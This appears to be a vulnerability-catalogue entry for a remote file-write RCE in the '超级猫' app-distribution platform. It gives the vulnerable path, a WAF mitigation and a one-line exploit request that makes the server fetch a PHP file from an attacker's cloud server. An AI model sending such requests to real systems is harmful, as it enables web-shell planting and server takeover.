vendor = "超级猫"
name = "超级猫签名APP分发平台前台远程文件写入漏洞"
type = "RCE"
version = "未知"
path = "/user/profile/download"
detail = "/user/profile/download?url=http://云服务器地址/111.php&path=1"
fix = "WAF封禁路路径，等待发布补丁"
date = "0729"
label = "1day"
